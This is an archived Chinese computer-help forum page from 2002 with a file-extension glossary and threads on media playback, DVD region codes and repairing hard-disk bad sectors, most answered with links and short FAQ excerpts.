OKT Oktalyzer音乐模块（MOD）文件
OLB OLE对象库
OLE OLE对象
OOGL 面向对象图形库
OPL 组织者编程语言源文件——Psion/Symbian
OPO OPL输出可执行文件
OPT Microsoft Developer Studio文件
OPX OPL扩展DLL（动态链接库）
ORA Oracle 7 配置文件
ORC Oracle 7脚本文件
ORG Lotus Organizer 文件
OR2 Lotus Organizer 2 文件
OR3 Lotus Organizer 97 文件
OSS Microsoft Office查找文件
OST Microsoft Exchange / Outlook 离线文件
OTL Super NoteTab 模板文件
OUT C语言输出文件
P3 Primavera Project Planner（工程设计器）文件
P10 Tektronix Plot 10 绘图文件
P65 PageMaker 6.5文件
P7C Digital ID 文件（MIME）
PAB Microsoft个人地址簿
PAC SB Studio Ⅱ 包
PAK Quake WAD文件
PAL 压缩文件
PART Go！Zilla部分下载文件
PAS Pascal源代码
PAT DataCAD Hatch模式文件；CorelDRAW模式；高级Gravis Ultrasound / Forte 技术；碎片文件
PBD PowerBuilder动态库，作为本地DLL的一个替代物
PBF Turtle Beach的Pinnacle 银行文件
PBK Microsoft PhoneBook（电话簿）
PBL 用于在PowerBuilder开发环境中的PowerBuilder动态库
PBM 可导出位图
PBR PowerBuilder资源
PCD Kodak Photo-CD映像；P-Code编译器测试脚本，由Microsoft测试与Microsoft Visual测试
PCE Maps Eudora邮箱名字的DOS文件名
PCL Hewlett-Packard 打印机控制语言文件（打印机备用位图）
PCM 声音文件格式；OKI MSM6376 合成芯片 PCM格式
PCP Symantec Live Update Pro文件
PCS PICS动画文件
PCT Macintosh PICT绘画文件
PCX Zsoft PC画笔位图
PDB 3Com PalmPilot数据库文件
PDD 可以用Paint Shop Pro或其他图像处理软件打开的图形图像
PDF Adobe Acrobat 可导出文档格式文件（可用Web浏览器显示）；Microsoft系统管理服务器包定义文件；NetWare打印机定义文件
PDP Broderbund的Print Shop Deluxe文件
PDQ Patton&Patton Flowercharting PDQ Lite 文件
PDS 摄影图像文件（该文件格式的来源不清楚）
PF Aladdin系统对私人文件进行加密的文件
PFA 类型1字体（ASCⅡ）
PFB 类型1字体（二进制）
PFC PF组件
PFM 打印机字体尺度
PGD 良好隐私（Pretty Good Privacy，PGP）虚拟磁盘文件
PGL HP绘图仪绘图文件
PGM 可输出灰度图（位图）
PGP 用良好隐私（PGP）算法加密文件
PH 由Microsoft帮助文件编译器产生的临时文件
PHP，PHP3 包含有PHP脚本的HTML网页
PHTML 包含有PHP脚本的HTML网页；由Perl分析解释的HTML
PIC PC画图位图；Lotus图片；Macintosh PICT绘图
PICT Macintosh PICT图形文件
PIF 程序信息文件；IBM PIF绘图文件
PIG LucasArts的Dark Forces WAD文件
PIN Epic Pinball数据文件
PIX 内置系统位图
PJ MKS源完整性文件
PJX，PJT Microsoft Visual FoxPro工程文件
PKG Microsoft Developer Studio应用程序扩展（与DLL文件类似）
PKR PGP的公用钥匙环
PL Perl程序
PLG 由REND386/AVRIL使用的文件格式
PLI Oracle 7数据描述
PLM Discorder Tracker2模块
PLS Disorder Tracker2抽样文件；MPEG PlayList文件（由WinAmp使用）
PLT HPGL绘图仪绘图文件；AutoCAD plot绘图文件；Gerber标志制作软件
PM5 Pagemaker 5.0文件
PM6 Pagemaker 6.0文件
PNG 可移植的网络图形位图；Paint Shop Pro浏览器目录
PNT，PNTG MacPaint图形文件
POG Descent2 PIG文件扩展
POL Windows NT策略文件
POP Visual dBASE上托文件
POT Microsoft Powerpoint模块
POV 视频射线跟踪器暂留
PP4 Picture Publisher 4位图
PPA Microsoft Powerpoint内插器
PPF Turtle Beach的Pinnacle程序文件
PPM 可移植的象素映射位图
PPP Parson Power Publisher；Serif PagePlus桌面出版缺省输出
PPS Microsoft Powerpoint幻灯片放映
PPT Microsoft Powerpoint演示文稿
PQI PowerQuest驱动器图像文件
PRC 3COM PalmPiltt资源（文本或程序）文件
PRE Lotus Freelance演示文稿
PRF Windows系统文件，Macromedia导演设置文件
PRG dBASE Clipper和FoxPro程序源文件；WAVmaker程序
PRJ 3D Studio（DOS）工程文件
PRN 打印表格（用空格分隔的文本）；DataCAD Windows打印机文件
PRP Oberson的Prospero数据转换产品保存的工程文件
PRS Harvard Graphics for Windows演示文件
PRT 打印格式化文件；Pro/ENGINEER元件文件
PRV PsiMail Internet提供者模板文件
PRZ Lotus Freelance Graphics 97文件
PS Postscript格式化文件（PostScript打印机可读文件）
PSB Pinnacle Sound Bank
PSD Adobe photoshop位图文件
PSI PSION a-Law声音文件
PSM Protracker Studio模型格式；Epic游戏的源数据文件
PSP Paint Shop Pro图像文件
PST Microsoft Outlook个人文件夹文件
PTD Pro/ENGINEER表格文件
PTM Polytracker音乐模块（MOD）文件
PUB Ventura Publisher出版物；Microsoft Publisher文档
PWD Microsoft Pocket Word文档
PWL Windows 95口令列表文件
PWP Photoworks图像文件（能被Photoworks浏览的一系列文件）
PWZ Microsoft Powerpoint向导
PXL Microsoft Pocket Excel电子表格
PY 来自Yahoo的电子消息；Python脚本文件
PYC Python脚本文件
QAD PF QuickArt文档
QBW QuickBooks for Windows文件
QDT 来自Quicken UK的QuickBooks数据文件，帐目/税/货单程序
QD3D Apple的QuickDraw 3D元文件格式
QFL FAMILY LAWYER文档
QIC Microsoft备份文件
QIF QuickTime相关图像（MIME）；Quicken导入文件
QLB Quick库
QM Quality Motion文件
QRY Microsoft查询文件
QST Quake Spy Tab文件
QT，QTM QuickTime电影
QTI，QTIF QuickTime相关图像
QTP QuickTime优先文件
QTS Mac PICT图像文件；QuickTime相关图像
QTX QuickTime相关图像
QW Symantec Q&A Write程序文件
QXD Quark XPress文件
R Pegasus邮件资源文件
RA RealAudio声音文件
RAM RealAudio元文件
RAR RAR压缩档案（Eugene Roshall格式）
RAS Sun光栅图像位图
RAW RAW文件格式（位图）；Raw标识的PCM数据
RBH 由RoboHELP维持的RBH文件，它加入到一个帮助工程文件的信息中
RDF 资源描述框架文件（涉及XML和元数据）
RDL Descent注册水平文件
REC 录音机宏；RapidComm声音文件
REG 注册表文件
REP Visual dBASE报表文件
RES Microsoft Visual C++资源文件
RFT 可修订的表单文本（IBM的DCA一部分或文档内容框架结构一部分）
RGB，SGI Silicon图形RGB文件
RLE Run-Length编码的位图
RL2 Descent2注册水平文件
RM RealAudio视频文件
RMD Microsoft RegMaid文档
RMF Rich Map格式（3D游戏编辑器使用它来保存图）
RMI M1D1音乐
ROM 基于盒式磁带的家庭游戏仿真器文件（来自Atari 2600、Colecovision、Sega、Nintendo等盒式磁带里的ROM完全拷贝，在两个仿真器之间不可互修改）
ROV Rescue Rover数据文件
RPM RedHat包管理器包（用于Linux）
RPT Microsoft Visual Basic Crystal报表文件
RRS Ace game Road Rash保存的文件
RSL Borland的Paradox 7报表
RSM WinWay Resume Writer恢复文件
RTF Rich Text格式文档
RTK RoboHELP使用的用来模拟Windows帮助的搜索功能
RTM Real Tracker音乐模块（MOD）文件
RTS RealAudio的RTSL文档；RoboHELP对复杂操作进行加速
RUL InstallShield使用的扩展名
RVP Microsoft Scan配置文件（MIME）
Rxx 多卷档案上的RAR压缩文件（xx= 1～99间的一个数字）
S 汇编源代码文件
S3I Scream Tracker v3设备
S3M Scream Tracker v3的声音模块文件
SAM Ami专业文档；8位抽样数据
SAV 游戏保存文件
SB 原始带符号字节（8位）数据
SBK Creative Labs的Soundfont 1.0 Bank文件；(Soundblaster)/EMU SonndFont v1.x Bank文件
SBL Shockwave Flash对象文件
SC2 Microsoft Schedule+7文件格式；SAS目录（Windows 95/NT、OS/2、Mac）
SC3 SimCity 3000保存的游戏文件
SCC Microsoft Source Safe文件
SCD Matrix/Imapro SCODL幻灯片图像；Microsoft Schedule +7
SCF Windows Explorer命令文件
SCH Microsoft Schedule+1
SCI ScanVec Inspire本地文件格式
SCN True Space 2场景文件
SCP 拨号网络脚本文件
SCR Windows屏幕保护；传真图像；脚本文件
SCT SAS目录（DOS）；Scitex CT位图；Microsoft FoxPro表单
SCT01 SAS目录（UNIX）
SCV ScanVec CASmate本地文件格式
SCX Microsoft FoxPro表单文件
SD Sound Designer 1声音文件
SD2 Sound Designer 2展平文件/数据分叉指令；SAS数据库（Windows 95/NT、OS/2、Mac）
SDF 系统数据文件格式—Legacy Unisys（Sperry）格式
SDK Roland S—系列软盘映像
SDL Smart Draw库文件
SDR Smart Draw绘图文件
SDS 原始Midi抽样转储标准文件
SDT SmartDraw模板
SDV 分号分隔的值文件
SDW Lotus WordPro图形文件；原始带符号的DWORD（32位）数据
SDX 由SDX压缩的Midi抽样转储标准文件
SEA 自解压档案（Stufflt for Macintosh或其他软件使用的文件）
SEP 标签图像文件格式（TIFF）位图
SES Cool Edit Session文件（普通数据声音编辑器文件）
SF IRCAM声音文件格式
SF2 Emu Soundfont v2.0文件；Creative Labs的Soundfont 2.0 Bank文件（Sound Blaster）
SFD SoundStage声音文件数据
SFI Sound Stage声音文件信息
SFR Sonic Foundry Sample资源
SFW Seattle电影工程（损坏的JPEG）
SFX RAR自解压档案
SGML 标准通用标签语言
SHB Corel Show演示文稿；文档快捷文件
SHG 热点位图
SHP 3D Studio（DOS）形状文件；被一些应用程序用于多部分交互三角形模型的3D建模
SHS Shell scrap文件；据载用于发送“口令盗窃者”
SHTML 含有服务器端包括（SSI）的HTML文件
SHW Corel Show演示文稿
SIG 符号文件
SIT Mac的StuffIt档案文件
SIZ Oracle 7配置文件
SKA PGP秘钥
SKL Macromedia导演者资源文件
SL PACT的保存布局扩展名
SLB Autodesk Slide库文件格式
SLD Autodesk Slide文件格式
SLK Symbolic Link（SYLK）电子表格
SM3 DataCAD标志文件
SMP Samplevision格式；Ad Lib Gold抽样文件
SND NeXT声音；Mac声音资源；原始的未符号化的PCM数据；AKAI MPC系列抽样文件
SNDR Sounder声音文件
SNDT Sndtool声音文件
SOU SB Studio Ⅱ声音
SPD Speech数据文件
SPL Shockwave Flash对象；DigiTrakker抽样
SPPACK SPPack声音抽样
SPRITE Acorn的位图格式
SQC 结构化查询语言（SQR）普通代码文件
SQL Informix SQL查询；通常被数据库产品用于SQL查询（脚本、文本、二进制）的文件扩展名
SQR 结构化查询语言（SQR）程序文件
SSDO1 SAS数据集合（UNIX）
SSD SAS数据库（DOS）
SSF 可用的电子表格文件
ST Atari ST磁盘映像
STL Sterolithography文件
STM .shtml的短后缀形式，含有一个服务端包括（SSI）的HTML文件；Scream Tracker V2音乐模块（MOD）文件
STR 屏幕保护文件
STY Ventura Publisher风格表
SVX Amiga 8SVX声音；互交换文件格式，8SVX/16SV
SW 原始带符号字（16位）数据
SWA 在Macromedia导演文件（MP3文件）中的Shockwave声音文件
SWF Shockwave Flash对象
SWP DataCAD交换文件
SYS 系统文件
SYW Yamaha SY系列波形文件
T64 Commodore 64仿真器磁带映像文件
TAB Guitar表文件
TAR 磁带档案
TAZ UNIX gzip/tape档案
TBK Asymetrix Toolbook交互多媒体文件
TCL 用TCL/TK语言编写的脚本
TDB Thumbs Plus数据库
TDDD Imagine 和 Turbo Silver射线跟踪器使用的文件格式
TEX 正文文件
TGA Targa位图
TGZ UNIX gzip/tap档案文件
THEME Windows 95桌面主题文件
THN Graphics WorkShop for Windows速写
TIF，TIFF 标签图像文件格式（TIFF）位图
TIG 虎形文件，美国政府用于分发地图
TLB OLE类型库
TLE 两线元素集合（NASA）
TMP Windows临时文件
TOC Eudora邮箱内容表
TOL Kodak照片增强器
TOS Atari 16/32和32/32计算机操作系统文件
TPL CakeWalk声音模板文件；DataCAD模板文件
TPP Teleport Pro工程
TRK Kermit脚本文件
TRM 终端文件
TRN MKS源完整性工程用法日志文件
TTF TrueType字体文件
TTK Corel Catalyst Translaton Tool Kit
TWF TabWorks文件
TWW Tagwrite模板
TX8 MS-DOS文本
TXB Descent/D2编码概要文件
TXT ASCⅡ文本格式的声音数据
TXW Yamaha TX16W波形文件
TZ 老的压缩格式文件
T2T Sonate CAD建模软件文件
UB 原始未符号化的字节（8位）数据
UDF Windows NT/2000唯一性数据库文件
UDW 原始未符号化的双字（32位）数据
ULAW 美国电话格式（CCITT G.711）声音
ULT Ultra Tracker音乐模块（MOD）文件
UNI MikMod UniMod格式化文件
URL Internet快捷方式文件
USE MKS源完整性文件
UU，UUE UU编码文件
UW 原始未符号化字（16位）数据
UWF UltraTracker波形文件
V8 Covox 8位声音文件
VAP 加注讲演文件
VBA VBase文件
VBP Microsoft Visual Basic工程文件
VBW Microsoft Visual Basic工作区文件
VBX Microsoft Visual Basic用户定制控件
VCE Natural MicroSystems（NMS）未格式化声音文件（由Cool Edit使用）
VCF 虚拟卡文件（Netscape）；Veri配置文件；为与Sense8的WordToolkit一起使用而定义对象
VCT，VCX Microsoft FoxPro类库
VDA Targa位图
VI National Instruments LABView产品的虚拟设备文件
VIFF Khoros Visualisation格式
VIR Norton Anti-Virus或其他杀毒产品用于标识被病毒感染的文件
VIV VivoActive Player流视频文件
VIZ Division的dVS/dVISE文件
VLB CorelVentura库
VMF FaxWorks声音文件
VOC Creative Labs的Sound Blaster声音文件
VOX 用ADPCM编码的对话声音文件；Natural MicroSystems（NMS）格式化声音文件，Talking Technology声音文件
VP Ventura Publisher出版物
VQE，VQL Yamaha Sound-VQ定位器文件
VQF Yamaha Sound-VQ文件（可能出现标准）
VRF Oracle 7配置文件
VRML 虚拟现实建模语言文件
VSD Visio绘画文件（流程图或图解）
VSL 下载列表文件（GetRight）
VSN Windows 9x/NT Virusafe版文件，用于保持有关目录中所有信息，当一个文件被访问，其中信息与VSN信息进行比较，以确保它们保持一致
VSS Visio模板文件
VST Targa位图
VSW Visio工作区文件
VXD Microsoft Windows虚拟设备驱动程序
W3L W3Launch文件
WAB Microsoft Outlook文件
WAD 包含有视频、玩家水平和其他信息的DOOM游戏的大文件
WAL Quake 2正文文件
WAV Windows波形声形
WB1，WB2 QuattoPro for Windows电子表格
WBK Microsoft Word备份文件
WBL Argo WebLoadⅡ上载文件
WBR Crick Software的WordBar文件
WBT Crick Software的WordBar模板
WCM WordPerfect宏
WDB Microsoft Works数据库
WDG War FTP远程守护者文件
WEB CorelXARA Web文档
WFB Turtle Beach的Wavefont Bank（Maui/Rio/Monterey）
WFD Turtle Beach的Wavefont Drum集合（Maui/Rio/Monterey）
WFM Visual dBASE Windows表单
WFN 在CorelDRAW中使用的符号
WFP Turtle Beach的Wavefont程序（Maui/Ri/Monterey）
WGP Wild Board游戏数据文件
WID Ventura宽度表
WIL WinImage文件
WIZ Microsoft Word向导
WK1 Lotus 1-2-3版第1、2版的电子表格
WK3 Lotus 1-2-3版第3版的电子表格
WK4 Lotus 1-2-3版第4版的电子表格
WKS Lotus 1-2-3电子表格；Microsoft Works文档
WLD REND386/AVRIL文件
WLF Argo WebLoadⅠ上载文件
WLL Microsoft Word内插器
WMF Windows元文件
WOW Grave Composer音乐模块（MOD）文件
WP WordPerfect文档
WP4 WordPerfect 4文档
WP5 WordPerfect 5文档
WP6 WordPerfect 6文档
WPD WordPerfect文档或演示
WPF 可字处理文档
WPG WordPerfect图形
WPS Microsoft Works文档
WPT WordPerfect模板
WPW Novell PerfectWorks文档
WQ1 Quattro Pro/DOS电子表格
WQ2 Quattro Pro/DOS第5版电子表格
WR1 Lotus Symphony
WRG ReGet文档
WR1 书写器文档
WRK Cakewalk音乐声音工程文件
WRL 虚拟现实模型
WRZ VRML文件对象
WS1 WordStar for Windows 1文档
WS2 WordStar for Windows 2文档
WS3 WordStar for Windows 3文档
WS4 WordStar for Windows 4文档
WS5 WordStar for Windows 5文档
WS6 WordStar for Windows 6文档
WS7 WordStar for Windows 7文档
WSD WordStar 2000文档
WVL Wavelet压缩位图
WWL Microsoft Word内插器文件
X AVS图像格式
XAR CorelXARA绘画
XBM MIME“xbitmap”图像
XI Scream Tracker设备抽样文件
XIF Wang映像文件（Windows 95带有的文件）
XLA Microsoft Excel内插器
XLB Microsoft Excel工具条
XLC Microsoft Excel图表
XLD Microsoft Excel对话框
XLK Microsoft Excel备份
XLL Microsoft Excel内插器文件
XLM Microsoft Excel宏
XLS Microsoft Excel工作单
XLT Microsoft Excel模板
XLV Microsoft Excel VBA模块
XLW Microsoft Excel工作簿/工作区
XM FastTracker 2，Digital Tracker音乐模块（MOD）文件
XNK Microsoft Exchange快捷方式文件
XPM X位图格式
XR1 Epic MegaGames Xargon数据文件
XTP Xtree数据文件
XWD X Windows转储格式
XWF Yamaha XG Works文件（MIDI序列）
XY3 XYWrite Ⅲ文档
XY4 XYWrite Ⅳ文档
XYP XYWrite Ⅲ Plus文档
XYW XYWrite for Windows 4.0文档
X16 宏媒体扩展（程序扩展），16位
X32 宏媒体扩展（程序扩展），32位
YAL Arts& Letters剪贴艺术库
YBK Microsoft Encarta 年鉴
Z UNIX gzip文件
ZAP Windows软件安装配置文件
ZIP Zip文件
ZOO 早前版本的压缩文件
000-999 用于为老版本（或备份）文件编号（比如：被安装程序改变的CONFIG.SYS文件）；又可用于为小范围的PC应用程序的多个用户相关数据文件编号
12M Lotus 1-2-3 97 SmartMaster文件
123 Lotus 1-2-3 97文件
2D VersaCAD的2维绘画文件
2GR，3GR 在Windows之下的VGA图形驱动程序/配置文件
3D VersaCAD的3维绘画文件
3DM 3D NURBS建模器，Rhino
3DS 3D Studio（DOS下）格式文件
386 在386或更高级处理器上使用的文件
4GE Informix 4GL编译后代码
4GL Informix 4GL源代码
669 Composer 669；UNIX Composer音乐模型文件；669磁道模块
#01 及更高的号 为计算机演示而扫描的一系列电影的图片文件编号方法
$$$ OS/2用来跟踪档案文件
@@@ 用于安装过程中的屏幕文件和用于Microsoft Codeview for C这样的应用程序的指导文件 。

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

hatto

初级用户
积分：19
发帖：6
来自：湖南衡阳
注册：2002-02-06
 发表于 2002-05-16 14:32:39 按此观看hatto的个人资料 按此发邮件给hatto hatto 的 oicq 是9466871,查看 9466871 的资料 发送悄悄话给hatto 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hatto的IP
不知道写这些干什么,有意思吗?

/\ /\
\ \/ /
/~~\/\/\
\ ~~\/\/
\ / 大家好啊！欢迎和我联系！
QQ:9466871
E-mail:hatto@163.com
msn:hattolk@msn.com
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-18 12:41:50 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
大家知道avi格式的文件用什么播放？？
http://www.52bj.com/bbs/NewsDetail.asp?id=483916

mp3怎么转成midi
http://www.52bj.com/bbs/NewsDetail.asp?id=483949

问怎么样实现AVI的再线观看！
http://www.52bj.com/bbs/NewsDetail.asp?id=482166

安完realplayer出现的问题
http://www.52bj.com/bbs/NewsDetail.asp?id=481490

求助：realplay下面如何截图？
http://www.52bj.com/bbs/NewsDetail.asp?id=478935

天呀!我看不了?!?!
http://www.52bj.com/bbs/NewsDetail.asp?id=483952

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 主题：操作技巧与文件扩展名知识
显示名字： 51windows [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


dvd区码的问题

计算机技术
dvd区码的问题

上一贴 | 下一贴
发表人 主题: dvd区码的问题
傻看着你

超级用户
积分：397
发帖：124
来自：
注册：2001-11-29
 发表于 2002-05-18 12:26:24 按此观看傻看着你的个人资料 按此发邮件给傻看着你 收藏该主题供以后查看 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
请问，我已经破解了dvd硬件的区码限制，可是在xp里察看dvd属性，还是发现有剩余修改次数，还有听说什么播放软件也有播放次数的限制

我想请问，这个究竟是怎么回事呢？是不是破解了dvd硬件的区码限制（刷fireware)成功后就一劳永逸了呢？

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-18 12:33:09 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
我对DVD了解的很少，搜了一下，找一点：

打造全区码DVD：
http://www.yesky.com/20011108/203951.shtml

Acer 16X DVD的区码限制
http://www.chip-china.com/maindocs/practice/200105/studyhard.htm

14. CSS将全世界分为几个区码？
全世界共有6个区码：
a. 第一区，包含：美国本土、加拿大、美国管辖区域。
b. 第二区，包含：日本、欧洲、南非、中东(包括埃及)。
c. 第三区，包含：东南亚、东亚(包括韩国)。
d. 第四区，包含：澳洲、纽西兰、太平洋各岛、中美洲、墨西哥、南美洲、加勒比海。
e. 第五区，包含：东欧(前苏联)、印度大陆、非洲、北韩、蒙古。
f. 第六区，包含中国大陆。

15. 硬件有区码限制吗？
有的，软件和硬件都有区码限制机制。
对DVD数字光驱有两类：Phase I (RPC I)DVD没有限制，全由软件来控制区码，Phase II (RPC II) DVD则内建区码限制电路，软件只能依硬件的设定来播放。
16. 从第一次安装PowerDVD时，能设定几次区码？
从第一次安装PowerDVD在计算机上算起，可以改变5次区码的设定。

17. 当已设定5次区码后，可否藉由移除PowerDVD，来解除原有设定？
这是不行的，如果你已设定过5次区码，就不可能再重新开启另5次区码设定。
(也就是说，此时您会固定在第五次选择的区码)

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 主题：dvd区码的问题
显示名字： 51windows [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


硬盘出现坏道

计算机技术
硬盘出现坏道

上一贴 | 下一贴
发表人 主题: 硬盘出现坏道
hatto

初级用户
积分：19
发帖：6
来自：湖南衡阳
注册：2002-02-06
 发表于 2002-05-23 12:33:30 按此观看hatto的个人资料 按此发邮件给hatto hatto 的 oicq 是9466871,查看 9466871 的资料 收藏该主题供以后查看 发送悄悄话给hatto 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hatto的IP
最近硬盘出了点问题,也就是最常出现的坏道，坏道还不是很多，占去的磁盘空间也就几十K吧，本来也没什么好担心的，但是因为在网上看了一篇文章说是坏道在运行的时候可能导致越来越多的坏道，所以我想把它分出来，隐藏起来不用。但是可能是因为太小了吧，用PartitionMagic 却找不出坏道，但是如果在windows下面格式化就会出现提示有多少坏道，后来干脆重分区，（不知道这样能不能找出坏道），重新格式化的时候有坏道的地方又过不去，只能格到百分之二十几就不行了，网上也说可以低格的，但我也弄不明白怎么做，而且低格对硬盘还有损害。现在也不知该怎么办，都搞了快半个星期了，希望大家能给我个好的解决办法！

/\ /\
\ \/ /
/~~\/\/\
\ ~~\/\/
\ / 大家好啊！欢迎和我联系！
QQ:9466871
E-mail:hatto@163.com
msn:hattolk@msn.com
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-23 14:00:54 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
帮不上大忙，因为没有经历过，所以只能找篇文章了！

重要的还是要预防为主：
硬盘有了坏道，如果不是因为老化问题，则说明平时在使用上有不妥之处，比如对硬盘过分频繁地整理碎片、内存太少以致应用软件对硬盘频频访问等。而忽略对硬盘的防尘处理也会导致硬盘磁头因为定位困难引发机械故障。另外，对CPU超频引起外频增高，迫使硬盘长时间在过高的电压下工作，也会引发故障，所以，平时对硬盘的使用还应以谨慎操作为上策。

硬盘坏道修复术
http://www.pchdd.com/articles/00Q1/000226/
低格能解决坏道问题吗？
http://www.pchdd.com/articles/99Q4/991208/
硬盘坏道修修补补
http://wwwb.pconline.com.cn/pchardware/maintain/storage/0111/011126_huaidao.htm
电脑综合诊治之硬盘故障详解
http://www.yesky.com/20010630/187537.shtml
硬盘修复经验谈
http://www.chip-china.com/maindocs/practice/200111/dim06.htm
硬盘的正确使用与坏道修复
http://soft.269.net/SoftWareIntroView.asp?RecordID=369

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 主题：硬盘出现坏道
显示名字： 51windows [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法: